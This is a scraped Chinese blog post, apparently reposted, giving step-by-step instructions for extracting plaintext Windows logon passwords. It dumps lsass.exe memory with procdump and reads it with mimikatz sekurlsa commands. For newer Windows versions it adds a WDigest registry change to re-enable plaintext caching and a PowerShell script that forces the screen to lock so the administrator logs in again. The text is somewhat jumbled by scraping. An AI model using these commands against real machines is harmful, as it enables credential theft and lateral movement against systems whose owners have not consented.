mimikatz+procdump 提取 Windows 明文密码
2021-01-12 10:31
标签:err dll 文章 color data- bsp 复制 signature dllimport 获取到内存文件 lsass.exe 进程 (它用于本地安全和登陆策略) 中存储的明文登录密码。 Windows10/2012 以下的版本: 2、拿到 mimikatz 文件夹执行命令读明文: 或者手工转存 lsass.dmp 文件,打开任务管理器,选中进程,并且在其中找到 lsass.exe 这一项。 2. 找到这一项之后,单击右键,选择创建转储文件。 3. 点击之后,电脑会将该文件转储到文件夹里面,我们需要记住这个路径,并且将这个文件复制到 mimikatz 的文件夹里面。 2、拿到 mimikatz 文件夹执行命令读明文: Windows10/2012R2 版本: 四步骤: 修改注册表来让 Wdigest Auth 保存明文口令: 修改注册表需要重启,或者注销账号重新登录。 然后拿到 mimikatz 文件夹执行命令读明文: 看别人的文章说能写一个强制锁屏的 powershell 脚本文件,通过锁屏让目标重新启动电脑。 Windows2012 版本强制锁屏脚本, 脚本使用方法: mimikatz+procdump 提取 Windows 明文密码 标签:err dll 文章 color data- bsp 复制 signature dllimport 原文地址:https://www.cnblogs.com/kuaile1314/p/12288476.html0x00 原理
0x01 操作
1、上传 procdump 执行命令转存出 lsass.dmp 文件(需要管理员权限)procdump64.exe -accepteula -ma lsass.exe lsass.dmp
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
默认 Windows10 或者 2012R2 以上的,禁止在内存缓存中保存明文密码。
1、修改注册表
2、锁屏或者退出账号
3、等待目标系统管理员重新登录
4、读取密码
复原把 1 改为 0reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
保存为 lock-screen.ps1:
记得查看管理员是否在线。Function Lock-WorkStation { $signature = @" [DllImport("user32.dll", SetLastError = true)] public static extern bool LockWorkStation(); "@ $LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru $LockWorkStation::LockWorkStation() | Out-Null}Lock-WorkStation
powershell -file lock-screen.ps1
文章标题:mimikatz+procdump 提取 Windows 明文密码
文章链接:http://soscw.com/essay/41403.html